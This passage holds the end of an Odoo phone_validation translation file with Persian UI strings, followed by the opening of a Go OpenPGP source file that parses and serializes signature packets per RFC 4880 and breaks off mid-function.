model_terms:ir.actions.act_window,help:phone_validation.phone_blacklist_action\nmsgid \"Add a phone number in the blacklist\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model_terms:ir.ui.view,arch_db:phone_validation.phone_blacklist_view_search\nmsgid \"Archived\"\nmsgstr \"بایگانی شده\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_attachment_count\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_attachment_count\nmsgid \"Attachment Count\"\nmsgstr \"تعداد پیوست\"\n\n#. module: phone_validation\n#: model_terms:ir.ui.view,arch_db:phone_validation.phone_blacklist_view_tree\nmsgid \"Blacklist Date\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model_terms:ir.actions.act_window,help:phone_validation.phone_blacklist_action\nmsgid \"\"\n\"Blacklisted phone numbers means that the recipient won't receive SMS \"\n\"Marketing anymore.\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model,name:phone_validation.model_res_partner\nmsgid \"Contact\"\nmsgstr \"تماس\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__create_uid\nmsgid \"Created by\"\nmsgstr \"ایجاد شده توسط\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__create_date\nmsgid \"Created on\"\nmsgstr \"ایجاد شده در\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__display_name\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__display_name\n#: model:ir.model.fields,field_description:phone_validation.field_phone_validation_mixin__display_name\nmsgid \"Display Name\"\nmsgstr \"نام نمایشی\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__phone_sanitized\nmsgid \"\"\n\"Field used to store sanitized phone number. Helps speeding up searches and \"\n\"comparisons.\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_follower_ids\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_follower_ids\nmsgid \"Followers\"\nmsgstr \"دنبال‌کنندگان\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_channel_ids\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_channel_ids\nmsgid \"Followers (Channels)\"\nmsgstr \"پیروان (کانال ها)\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_partner_ids\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_partner_ids\nmsgid \"Followers (Partners)\"\nmsgstr \"پیروان (شرکاء)\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__id\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__id\n#: model:ir.model.fields,field_description:phone_validation.field_phone_validation_mixin__id\nmsgid \"ID\"\nmsgstr \"شناسه\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_needaction\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_unread\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_needaction\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_unread\nmsgid \"If checked, new messages require your attention.\"\nmsgstr \"\"\n\"اگر این گزینه را انتخاب کنید، پیام‌های جدید به توجه شما نیاز خواهند داشت.\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_has_error\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_has_error\nmsgid \"If checked, some messages have a delivery error.\"\nmsgstr \"در صورت بررسی ، برخی پیام ها خطای تحویل دارند.\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__phone_blacklisted\nmsgid \"\"\n\"If the email address is on the blacklist, the contact won't receive mass \"\n\"mailing anymore, from any list\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/tools/phone_validation.py:0\n#, python-format\nmsgid \"Impossible number %s: probably invalid number of digits\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/models/phone_blacklist.py:0\n#: code:addons/phone_validation/models/phone_blacklist.py:0\n#, python-format\nmsgid \"Invalid number %s\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/tools/phone_validation.py:0\n#, python-format\nmsgid \"Invalid number %s: probably incorrect prefix\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/models/mail_thread_phone.py:0\n#: code:addons/phone_validation/models/mail_thread_phone.py:0\n#, python-format\nmsgid \"Invalid primary phone field on model %s\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_is_follower\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_is_follower\nmsgid \"Is Follower\"\nmsgstr \"دنبال می کند\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone____last_update\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist____last_update\n#: model:ir.model.fields,field_description:phone_validation.field_phone_validation_mixin____last_update\nmsgid \"Last Modified on\"\nmsgstr \"آخرین تغییر در\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__write_uid\nmsgid \"Last Updated by\"\nmsgstr \"آخرین تغییر توسط\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__write_date\nmsgid \"Last Updated on\"\nmsgstr \"آخرین به روز رسانی در\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_main_attachment_id\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_main_attachment_id\nmsgid \"Main Attachment\"\nmsgstr \"پیوست اصلی\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_has_error\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_has_error\nmsgid \"Message Delivery error\"\nmsgstr \"خطای تحویل پیام\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_ids\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_ids\nmsgid \"Messages\"\nmsgstr \"پیام‌ها\"\n\n#. module: phone_validation\n#: model:ir.model.constraint,message:phone_validation.constraint_phone_blacklist_unique_number\nmsgid \"Number already exists\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_needaction_counter\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_needaction_counter\nmsgid \"Number of Actions\"\nmsgstr \"تعداد اقدامات\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_has_error_counter\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_has_error_counter\nmsgid \"Number of errors\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_needaction_counter\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_needaction_counter\nmsgid \"Number of messages which requires an action\"\nmsgstr \"تعداد پیام ها که نیاز به عمل\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_has_error_counter\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_has_error_counter\nmsgid \"Number of messages with delivery error\"\nmsgstr \"تعداد پیامهای با خطای تحویل\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_mail_thread_phone__message_unread_counter\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__message_unread_counter\nmsgid \"Number of unread messages\"\nmsgstr \"تعداد پیام‌های خوانده نشده\"\n\n#. module: phone_validation\n#: model:ir.model.fields,help:phone_validation.field_phone_blacklist__number\nmsgid \"Number should be E164 formatted\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.ui.menu,name:phone_validation.phone_menu_main\nmsgid \"Phone / SMS\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.actions.act_window,name:phone_validation.phone_blacklist_action\n#: model:ir.model,name:phone_validation.model_phone_blacklist\n#: model:ir.ui.menu,name:phone_validation.phone_blacklist_menu\n#: model_terms:ir.ui.view,arch_db:phone_validation.phone_blacklist_view_form\n#: model_terms:ir.ui.view,arch_db:phone_validation.phone_blacklist_view_tree\nmsgid \"Phone Blacklist\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model,name:phone_validation.model_mail_thread_phone\nmsgid \"Phone Blacklist Mixin\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__phone_blacklisted\nmsgid \"Phone Blacklisted\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__number\nmsgid \"Phone Number\"\nmsgstr \"شماره تلفن\"\n\n#. module: phone_validation\n#: model:ir.model,name:phone_validation.model_phone_validation_mixin\nmsgid \"Phone Validation Mixin\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__phone_sanitized\nmsgid \"Sanitized Number\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/tools/phone_validation.py:0\n#, python-format\nmsgid \"\"\n\"Unable to format %s:\\n\"\n\"%s\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: code:addons/phone_validation/tools/phone_validation.py:0\n#, python-format\nmsgid \"Unable to parse %s: %s\"\nmsgstr \"\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_unread\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_unread\nmsgid \"Unread Messages\"\nmsgstr \"پیام های ناخوانده\"\n\n#. module: phone_validation\n#: model:ir.model.fields,field_description:phone_validation.field_mail_thread_phone__message_unread_counter\n#: model:ir.model.fields,field_description:phone_validation.field_phone_blacklist__message_unread_counter\nmsgid \"Unread Messages Counter\"\nmsgstr \"شمارنده پیام‌های خوانده‌نشده\"\n"} {"text": "// Copyright 2011 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\npackage packet\n\nimport (\n\t\"bytes\"\n\t\"crypto\"\n\t\"crypto/dsa\"\n\t\"crypto/ecdsa\"\n\t\"encoding/binary\"\n\t\"fmt\"\n\t\"hash\"\n\t\"io\"\n\t\"strconv\"\n\t\"time\"\n\n\t\"github.com/keybase/go-crypto/openpgp/errors\"\n\t\"github.com/keybase/go-crypto/openpgp/s2k\"\n\t\"github.com/keybase/go-crypto/rsa\"\n)\n\nconst (\n\t// See RFC 4880, section 5.2.3.21 for details.\n\tKeyFlagCertify = 1 << iota\n\tKeyFlagSign\n\tKeyFlagEncryptCommunications\n\tKeyFlagEncryptStorage\n)\n\n// Signer can be implemented by application code to do actual signing.\ntype Signer interface {\n\thash.Hash\n\tSign(sig *Signature) error\n\tKeyId() uint64\n\tPublicKeyAlgo() PublicKeyAlgorithm\n}\n\n// RevocationKey represents designated revoker packet. See RFC 4880\n// section 5.2.3.15 for details.\ntype RevocationKey struct {\n\tClass byte\n\tPublicKeyAlgo PublicKeyAlgorithm\n\tFingerprint []byte\n}\n\n// KeyFlagBits holds boolean whether any usage flags were provided in\n// the signature and BitField with KeyFlag* flags.\ntype KeyFlagBits struct {\n\tValid bool\n\tBitField byte\n}\n\n// Signature represents a signature. See RFC 4880, section 5.2.\ntype Signature struct {\n\tSigType SignatureType\n\tPubKeyAlgo PublicKeyAlgorithm\n\tHash crypto.Hash\n\n\t// HashSuffix is extra data that is hashed in after the signed data.\n\tHashSuffix []byte\n\t// HashTag contains the first two bytes of the hash for fast rejection\n\t// of bad signed data.\n\tHashTag [2]byte\n\tCreationTime time.Time\n\n\tRSASignature parsedMPI\n\tDSASigR, DSASigS parsedMPI\n\tECDSASigR, ECDSASigS parsedMPI\n\tEdDSASigR, EdDSASigS parsedMPI\n\n\t// rawSubpackets contains the unparsed subpackets, in order.\n\trawSubpackets []outputSubpacket\n\n\t// The following are optional so are nil when not included in the\n\t// signature.\n\n\tSigLifetimeSecs, KeyLifetimeSecs *uint32\n\tPreferredSymmetric, PreferredHash, PreferredCompression []uint8\n\tPreferredKeyServer string\n\tIssuerKeyId *uint64\n\tIsPrimaryId *bool\n\tIssuerFingerprint []byte\n\n\t// FlagsValid is set if any flags were given. See RFC 4880, section\n\t// 5.2.3.21 for details.\n\tFlagsValid bool\n\tFlagCertify, FlagSign, FlagEncryptCommunications, FlagEncryptStorage bool\n\n\t// RevocationReason is set if this signature has been revoked.\n\t// See RFC 4880, section 5.2.3.23 for details.\n\tRevocationReason *uint8\n\tRevocationReasonText string\n\n\t// PolicyURI is optional. See RFC 4880, Section 5.2.3.20 for details\n\tPolicyURI string\n\n\t// Regex is a regex that can match a PGP UID. See RFC 4880, 5.2.3.14 for details\n\tRegex string\n\n\t// MDC is set if this signature has a feature packet that indicates\n\t// support for MDC subpackets.\n\tMDC bool\n\n\t// EmbeddedSignature, if non-nil, is a signature of the parent key, by\n\t// this key. This prevents an attacker from claiming another's signing\n\t// subkey as their own.\n\tEmbeddedSignature *Signature\n\n\t// StubbedOutCriticalError is not fail-stop, since it shouldn't break key parsing\n\t// when appearing in WoT-style cross signatures. But it should prevent a signature\n\t// from being applied to a primary or subkey.\n\tStubbedOutCriticalError error\n\n\t// DesignaterRevoker will be present if this signature certifies a\n\t// designated revoking key id (3rd party key that can sign\n\t// revocation for this key).\n\tDesignatedRevoker *RevocationKey\n\n\toutSubpackets []outputSubpacket\n}\n\nfunc (sig *Signature) parse(r io.Reader) (err error) {\n\t// RFC 4880, section 5.2.3\n\tvar buf [5]byte\n\t_, err = readFull(r, buf[:1])\n\tif err != nil {\n\t\treturn\n\t}\n\tif buf[0] != 4 {\n\t\terr = errors.UnsupportedError(\"signature packet version \" + strconv.Itoa(int(buf[0])))\n\t\treturn\n\t}\n\n\t_, err = readFull(r, buf[:5])\n\tif err != nil {\n\t\treturn\n\t}\n\tsig.SigType = SignatureType(buf[0])\n\tsig.PubKeyAlgo = PublicKeyAlgorithm(buf[1])\n\tswitch sig.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly, PubKeyAlgoDSA, PubKeyAlgoECDSA, PubKeyAlgoEdDSA:\n\tdefault:\n\t\terr = errors.UnsupportedError(\"public key algorithm \" + strconv.Itoa(int(sig.PubKeyAlgo)))\n\t\treturn\n\t}\n\n\tvar ok bool\n\tsig.Hash, ok = s2k.HashIdToHash(buf[2])\n\tif !ok {\n\t\treturn errors.UnsupportedError(\"hash function \" + strconv.Itoa(int(buf[2])))\n\t}\n\n\thashedSubpacketsLength := int(buf[3])<<8 | int(buf[4])\n\tl := 6 + hashedSubpacketsLength\n\tsig.HashSuffix = make([]byte, l+6)\n\tsig.HashSuffix[0] = 4\n\tcopy(sig.HashSuffix[1:], buf[:5])\n\thashedSubpackets := sig.HashSuffix[6:l]\n\t_, err = readFull(r, hashedSubpackets)\n\tif err != nil {\n\t\treturn\n\t}\n\t// See RFC 4880, section 5.2.4\n\ttrailer := sig.HashSuffix[l:]\n\ttrailer[0] = 4\n\ttrailer[1] = 0xff\n\ttrailer[2] = uint8(l >> 24)\n\ttrailer[3] = uint8(l >> 16)\n\ttrailer[4] = uint8(l >> 8)\n\ttrailer[5] = uint8(l)\n\n\terr = parseSignatureSubpackets(sig, hashedSubpackets, true)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t_, err = readFull(r, buf[:2])\n\tif err != nil {\n\t\treturn\n\t}\n\tunhashedSubpacketsLength := int(buf[0])<<8 | int(buf[1])\n\tunhashedSubpackets := make([]byte, unhashedSubpacketsLength)\n\t_, err = readFull(r, unhashedSubpackets)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = parseSignatureSubpackets(sig, unhashedSubpackets, false)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t_, err = readFull(r, sig.HashTag[:2])\n\tif err != nil {\n\t\treturn\n\t}\n\n\tswitch sig.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly:\n\t\tsig.RSASignature.bytes, sig.RSASignature.bitLength, err = readMPI(r)\n\tcase PubKeyAlgoDSA:\n\t\tsig.DSASigR.bytes, sig.DSASigR.bitLength, err = readMPI(r)\n\t\tif err == nil {\n\t\t\tsig.DSASigS.bytes, sig.DSASigS.bitLength, err = readMPI(r)\n\t\t}\n\tcase PubKeyAlgoEdDSA:\n\t\tsig.EdDSASigR.bytes, sig.EdDSASigR.bitLength, err = readMPI(r)\n\t\tif err == nil {\n\t\t\tsig.EdDSASigS.bytes, sig.EdDSASigS.bitLength, err = readMPI(r)\n\t\t}\n\tcase PubKeyAlgoECDSA:\n\t\tsig.ECDSASigR.bytes, sig.ECDSASigR.bitLength, err = readMPI(r)\n\t\tif err == nil {\n\t\t\tsig.ECDSASigS.bytes, sig.ECDSASigS.bitLength, err = readMPI(r)\n\t\t}\n\tdefault:\n\t\tpanic(\"unreachable\")\n\t}\n\treturn\n}\n\n// parseSignatureSubpackets parses subpackets of the main signature packet. See\n// RFC 4880, section 5.2.3.1.\nfunc parseSignatureSubpackets(sig *Signature, subpackets []byte, isHashed bool) (err error) {\n\tfor len(subpackets) > 0 {\n\t\tsubpackets, err = parseSignatureSubpacket(sig, subpackets, isHashed)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\tif sig.CreationTime.IsZero() {\n\t\terr = errors.StructuralError(\"no creation time in signature\")\n\t}\n\n\treturn\n}\n\ntype signatureSubpacketType uint8\n\nconst (\n\tcreationTimeSubpacket signatureSubpacketType = 2\n\tsignatureExpirationSubpacket signatureSubpacketType = 3\n\tregularExpressionSubpacket signatureSubpacketType = 6\n\tkeyExpirationSubpacket signatureSubpacketType = 9\n\tprefSymmetricAlgosSubpacket signatureSubpacketType = 11\n\trevocationKey signatureSubpacketType = 12\n\tissuerSubpacket signatureSubpacketType = 16\n\tprefHashAlgosSubpacket signatureSubpacketType = 21\n\tprefCompressionSubpacket signatureSubpacketType = 22\n\tprefKeyServerSubpacket signatureSubpacketType = 24\n\tprimaryUserIdSubpacket signatureSubpacketType = 25\n\tpolicyURISubpacket signatureSubpacketType = 26\n\tkeyFlagsSubpacket signatureSubpacketType = 27\n\treasonForRevocationSubpacket signatureSubpacketType = 29\n\tfeaturesSubpacket signatureSubpacketType = 30\n\tembeddedSignatureSubpacket signatureSubpacketType = 32\n\tissuerFingerprint signatureSubpacketType = 33\n)\n\n// parseSignatureSubpacket parses a single subpacket. len(subpacket) is >= 1.\nfunc parseSignatureSubpacket(sig *Signature, subpacket []byte, isHashed bool) (rest []byte, err error) {\n\t// RFC 4880, section 5.2.3.1\n\tvar (\n\t\tlength uint32\n\t\tpacketType signatureSubpacketType\n\t\tisCritical bool\n\t)\n\tswitch {\n\tcase subpacket[0] < 192:\n\t\tlength = uint32(subpacket[0])\n\t\tsubpacket = subpacket[1:]\n\tcase subpacket[0] < 255:\n\t\tif len(subpacket) < 2 {\n\t\t\tgoto Truncated\n\t\t}\n\t\tlength = uint32(subpacket[0]-192)<<8 + uint32(subpacket[1]) + 192\n\t\tsubpacket = subpacket[2:]\n\tdefault:\n\t\tif len(subpacket) < 5 {\n\t\t\tgoto Truncated\n\t\t}\n\t\tlength = uint32(subpacket[1])<<24 |\n\t\t\tuint32(subpacket[2])<<16 |\n\t\t\tuint32(subpacket[3])<<8 |\n\t\t\tuint32(subpacket[4])\n\t\tsubpacket = subpacket[5:]\n\t}\n\tif length > uint32(len(subpacket)) {\n\t\tgoto Truncated\n\t}\n\trest = subpacket[length:]\n\tsubpacket = subpacket[:length]\n\tif len(subpacket) == 0 {\n\t\terr = errors.StructuralError(\"zero length signature subpacket\")\n\t\treturn\n\t}\n\tpacketType = signatureSubpacketType(subpacket[0] & 0x7f)\n\tisCritical = subpacket[0]&0x80 == 0x80\n\tsubpacket = subpacket[1:]\n\tsig.rawSubpackets = append(sig.rawSubpackets, outputSubpacket{isHashed, packetType, isCritical, subpacket})\n\tswitch packetType {\n\tcase creationTimeSubpacket:\n\t\tif !isHashed {\n\t\t\terr = errors.StructuralError(\"signature creation time in non-hashed area\")\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) != 4 {\n\t\t\terr = errors.StructuralError(\"signature creation time not four bytes\")\n\t\t\treturn\n\t\t}\n\t\tt := binary.BigEndian.Uint32(subpacket)\n\t\tsig.CreationTime = time.Unix(int64(t), 0)\n\tcase signatureExpirationSubpacket:\n\t\t// Signature expiration time, section 5.2.3.10\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) != 4 {\n\t\t\terr = errors.StructuralError(\"expiration subpacket with bad length\")\n\t\t\treturn\n\t\t}\n\t\tsig.SigLifetimeSecs = new(uint32)\n\t\t*sig.SigLifetimeSecs = binary.BigEndian.Uint32(subpacket)\n\tcase keyExpirationSubpacket:\n\t\t// Key expiration time, section 5.2.3.6\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) != 4 {\n\t\t\terr = errors.StructuralError(\"key expiration subpacket with bad length\")\n\t\t\treturn\n\t\t}\n\t\tsig.KeyLifetimeSecs = new(uint32)\n\t\t*sig.KeyLifetimeSecs = binary.BigEndian.Uint32(subpacket)\n\tcase prefSymmetricAlgosSubpacket:\n\t\t// Preferred symmetric algorithms, section 5.2.3.7\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tsig.PreferredSymmetric = make([]byte, len(subpacket))\n\t\tcopy(sig.PreferredSymmetric, subpacket)\n\tcase issuerSubpacket:\n\t\t// Issuer, section 5.2.3.5\n\t\tif len(subpacket) != 8 {\n\t\t\terr = errors.StructuralError(\"issuer subpacket with bad length\")\n\t\t\treturn\n\t\t}\n\t\tsig.IssuerKeyId = new(uint64)\n\t\t*sig.IssuerKeyId = binary.BigEndian.Uint64(subpacket)\n\tcase prefHashAlgosSubpacket:\n\t\t// Preferred hash algorithms, section 5.2.3.8\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tsig.PreferredHash = make([]byte, len(subpacket))\n\t\tcopy(sig.PreferredHash, subpacket)\n\tcase prefCompressionSubpacket:\n\t\t// Preferred compression algorithms, section 5.2.3.9\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tsig.PreferredCompression = make([]byte, len(subpacket))\n\t\tcopy(sig.PreferredCompression, subpacket)\n\tcase primaryUserIdSubpacket:\n\t\t// Primary User ID, section 5.2.3.19\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) != 1 {\n\t\t\terr = errors.StructuralError(\"primary user id subpacket with bad length\")\n\t\t\treturn\n\t\t}\n\t\tsig.IsPrimaryId = new(bool)\n\t\tif subpacket[0] > 0 {\n\t\t\t*sig.IsPrimaryId = true\n\t\t}\n\tcase keyFlagsSubpacket:\n\t\t// Key flags, section 5.2.3.21\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) == 0 {\n\t\t\terr = errors.StructuralError(\"empty key flags subpacket\")\n\t\t\treturn\n\t\t}\n\t\tif subpacket[0] != 0 {\n\t\t\tsig.FlagsValid = true\n\t\t\tif subpacket[0]&KeyFlagCertify != 0 {\n\t\t\t\tsig.FlagCertify = true\n\t\t\t}\n\t\t\tif subpacket[0]&KeyFlagSign != 0 {\n\t\t\t\tsig.FlagSign = true\n\t\t\t}\n\t\t\tif subpacket[0]&KeyFlagEncryptCommunications != 0 {\n\t\t\t\tsig.FlagEncryptCommunications = true\n\t\t\t}\n\t\t\tif subpacket[0]&KeyFlagEncryptStorage != 0 {\n\t\t\t\tsig.FlagEncryptStorage = true\n\t\t\t}\n\t\t}\n\tcase reasonForRevocationSubpacket:\n\t\t// Reason For Revocation, section 5.2.3.23\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) == 0 {\n\t\t\terr = errors.StructuralError(\"empty revocation reason subpacket\")\n\t\t\treturn\n\t\t}\n\t\tsig.RevocationReason = new(uint8)\n\t\t*sig.RevocationReason = subpacket[0]\n\t\tsig.RevocationReasonText = string(subpacket[1:])\n\tcase featuresSubpacket:\n\t\t// Features subpacket, section 5.2.3.24 specifies a very general\n\t\t// mechanism for OpenPGP implementations to signal support for new\n\t\t// features. In practice, the subpacket is used exclusively to\n\t\t// indicate support for MDC-protected encryption.\n\t\tsig.MDC = len(subpacket) >= 1 && subpacket[0]&1 == 1\n\tcase embeddedSignatureSubpacket:\n\t\t// Only usage is in signatures that cross-certify\n\t\t// signing subkeys. section 5.2.3.26 describes the\n\t\t// format, with its usage described in section 11.1\n\t\tif sig.EmbeddedSignature != nil {\n\t\t\terr = errors.StructuralError(\"Cannot have multiple embedded signatures\")\n\t\t\treturn\n\t\t}\n\t\tsig.EmbeddedSignature = new(Signature)\n\t\t// Embedded signatures are required to be v4 signatures see\n\t\t// section 12.1. However, we only parse v4 signatures in this\n\t\t// file anyway.\n\t\tif err := sig.EmbeddedSignature.parse(bytes.NewBuffer(subpacket)); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif sigType := sig.EmbeddedSignature.SigType; sigType != SigTypePrimaryKeyBinding {\n\t\t\treturn nil, errors.StructuralError(\"cross-signature has unexpected type \" + strconv.Itoa(int(sigType)))\n\t\t}\n\tcase policyURISubpacket:\n\t\t// See RFC 4880, Section 5.2.3.20\n\t\tsig.PolicyURI = string(subpacket[:])\n\tcase regularExpressionSubpacket:\n\t\tsig.Regex = string(subpacket[:])\n\t\tif isCritical {\n\t\t\tsig.StubbedOutCriticalError = errors.UnsupportedError(\"regex support is stubbed out\")\n\t\t}\n\tcase prefKeyServerSubpacket:\n\t\tsig.PreferredKeyServer = string(subpacket[:])\n\tcase issuerFingerprint:\n\t\t// The first byte is how many bytes the fingerprint is, but we'll just\n\t\t// read until the end of the subpacket, so we'll ignore it.\n\t\tsig.IssuerFingerprint = append([]byte{}, subpacket[1:]...)\n\tcase revocationKey:\n\t\t// Authorizes the specified key to issue revocation signatures\n\t\t// for a key.\n\n\t\t// TODO: Class octet must have bit 0x80 set. If the bit 0x40\n\t\t// is set, then this means that the revocation information is\n\t\t// sensitive.\n\t\tsig.DesignatedRevoker = &RevocationKey{\n\t\t\tClass: subpacket[0],\n\t\t\tPublicKeyAlgo: PublicKeyAlgorithm(subpacket[1]),\n\t\t\tFingerprint: append([]byte{}, subpacket[2:]...),\n\t\t}\n\tdefault:\n\t\tif isCritical {\n\t\t\terr = errors.UnsupportedError(\"unknown critical signature subpacket type \" + strconv.Itoa(int(packetType)))\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n\nTruncated:\n\terr = errors.StructuralError(\"signature subpacket truncated\")\n\treturn\n}\n\n// subpacketLengthLength returns the length, in bytes, of an encoded length value.\nfunc subpacketLengthLength(length int) int {\n\tif length < 192 {\n\t\treturn 1\n\t}\n\tif length < 16320 {\n\t\treturn 2\n\t}\n\treturn 5\n}\n\n// serializeSubpacketLength marshals the given length into to.\nfunc serializeSubpacketLength(to []byte, length int) int {\n\t// RFC 4880, Section 4.2.2.\n\tif length < 192 {\n\t\tto[0] = byte(length)\n\t\treturn 1\n\t}\n\tif length < 16320 {\n\t\tlength -= 192\n\t\tto[0] = byte((length >> 8) + 192)\n\t\tto[1] = byte(length)\n\t\treturn 2\n\t}\n\tto[0] = 255\n\tto[1] = byte(length >> 24)\n\tto[2] = byte(length >> 16)\n\tto[3] = byte(length >> 8)\n\tto[4] = byte(length)\n\treturn 5\n}\n\n// subpacketsLength returns the serialized length, in bytes, of the given\n// subpackets.\nfunc subpacketsLength(subpackets []outputSubpacket, hashed bool) (length int) {\n\tfor _, subpacket := range subpackets {\n\t\tif subpacket.hashed == hashed {\n\t\t\tlength += subpacketLengthLength(len(subpacket.contents) + 1)\n\t\t\tlength += 1 // type byte\n\t\t\tlength += len(subpacket.contents)\n\t\t}\n\t}\n\treturn\n}\n\n// serializeSubpackets marshals the given subpackets into to.\nfunc serializeSubpackets(to []byte, subpackets []outputSubpacket, hashed bool) {\n\tfor _, subpacket := range subpackets {\n\t\tif subpacket.hashed == hashed {\n\t\t\tn := serializeSubpacketLength(to, len(subpacket.contents)+1)\n\t\t\tto[n] = byte(subpacket.subpacketType)\n\t\t\tto = to[1+n:]\n\t\t\tn = copy(to, subpacket.contents)\n\t\t\tto = to[n:]\n\t\t}\n\t}\n\treturn\n}\n\n// KeyExpired returns whether sig is a self-signature of a key that has\n// expired.\nfunc (sig *Signature) KeyExpired(currentTime time.Time) bool {\n\tif sig.KeyLifetimeSecs == nil {\n\t\treturn false\n\t}\n\texpiry := sig.CreationTime.Add(time.Duration(*sig.KeyLifetimeSecs) * time.Second)\n\treturn currentTime.After(expiry)\n}\n\n// ExpiresBeforeOther checks if other signature has expiration at\n// later date than sig.\nfunc (sig *Signature) ExpiresBeforeOther(other *Signature) bool {\n\tif sig.KeyLifetimeSecs == nil {\n\t\t// This sig never expires, or has infinitely long expiration\n\t\t// time.\n\t\treturn false\n\t} else if other.KeyLifetimeSecs == nil {\n\t\t// This sig expires at some non-infinite point, but the other\n\t\t// sig never expires.\n\t\treturn true\n\t}\n\n\tgetExpiryDate := func(s *Signature) time.Time {\n\t\treturn 